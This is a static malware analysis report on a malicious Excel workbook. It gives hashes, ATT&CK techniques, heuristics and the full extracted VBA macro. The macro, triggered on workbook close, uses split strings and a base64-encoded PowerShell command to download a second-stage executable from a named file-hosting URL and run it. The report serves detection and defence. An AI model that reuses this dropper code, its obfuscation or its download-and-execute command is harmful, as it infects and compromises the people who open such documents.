Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 fce9a08d6ab78a6c…

MALICIOUS

Office (OOXML)

463.8 KB Created: 2020-01-28 19:47:00 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-10-23
MD5: a588b0551075fdbf8317636bda34ca18 SHA-1: 7928fae7258f1cdbda8d90b555ccb2738a8a08a4 SHA-256: fce9a08d6ab78a6c45c88a39bb897c10cabb917aafacdef66994d93c0ea3f1e0
172 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment T1204.002 Malicious File

The VBA macro contains obfuscated code that, when decoded, reveals a PowerShell command. This command is designed to download a second-stage payload from the URL 'https://www.4sync.com/web/directDownload/8jRtVQkU/L7ozfgqr.d9af2cbeecb8ad2c3e3cce893c'. The document body itself contains a lure, instructing the user to 'Enable Content' to view the spreadsheet, which is a common tactic for macro-based malware. The use of Shell() and the reassembled PowerShell command indicate a clear intent to execute arbitrary code.

Heuristics 7

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • External hyperlinks (2) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 2 external hyperlinks — clickable URLs are stored as external relationships. First target: https://go.microsoft.com/fwlink/?linkid=844749
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/2000/svg In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/xlinkIn document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/tiff/1.0/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/exif/1.0/In document text (OOXML body / shared strings)
    • https://go.microsoft.com/fwlink/?linkid=844749Document hyperlink
    • http://go.microsoft.com/fwlink/?LinkId=844969Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844732Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844745Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844729Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844752Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844750Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844731Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844742Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844730Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844739Document hyperlink
    • http://go.microsoft.com/fwlink/?LinkId=846286Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844751Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844743Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844726Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844725Document hyperlink
    • https://go.microsoft.com/fwlink/?linkid=844734Document hyperlink

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5640 bytes
SHA-256: 6e885834326b5bf83824a4b329af0c65505d3f274af0076613a2bf3059e2e6ce
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
Dim i As Double
Dim batch As String
Dim call1 As String
Dim enc As String
enc = "JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBKAHQAYwByAGkAegBsAHIAYQBpAG8AYgB1AG8AcAByAC4AZQB4AGUAIgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuADQAcwB5AG4AYwAuAGMAbwBtAC8AdwBlAGIALwBkAGkAcgBlAGMAdABEAG8AdwBuAGwAbwBhAGQALwA4AGoAUgB0AFYAUQBLAFUALwBMADcAbwBaAHoAZgBxAHIALgBkADkAYQBmADIAYwBiAGUAZQBiAGMAZAA1AGMAOABhADgAYQBkAGQAYwAyADMAZQAzAGMAYwBlADgAOQAzADMAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA=="
call1 = "WindowsPo" + "werShell\v1.0\pow" + "ershell.exe"
ActiveWorkbook.Save
batch = "Vylxjnypxajbroztle.bat"
Open batch For Output As #1
    Print #1, "start /MIN C:\Windo" + "ws\SysWOW64\" + call1 + " -win 1 -enc " + enc
    Close #1
    i = Shell(batch, 0)
End Sub

Private Sub Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)

End Sub

Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub


Private Sub Cellss()

End Sub

Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)

End Sub

Attribute VB_Name = "Start"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attr
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 37888 bytes
SHA-256: 6182bca45261b723083383b04548a39ef81d767063e49c5a132a15a231e8ae9b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).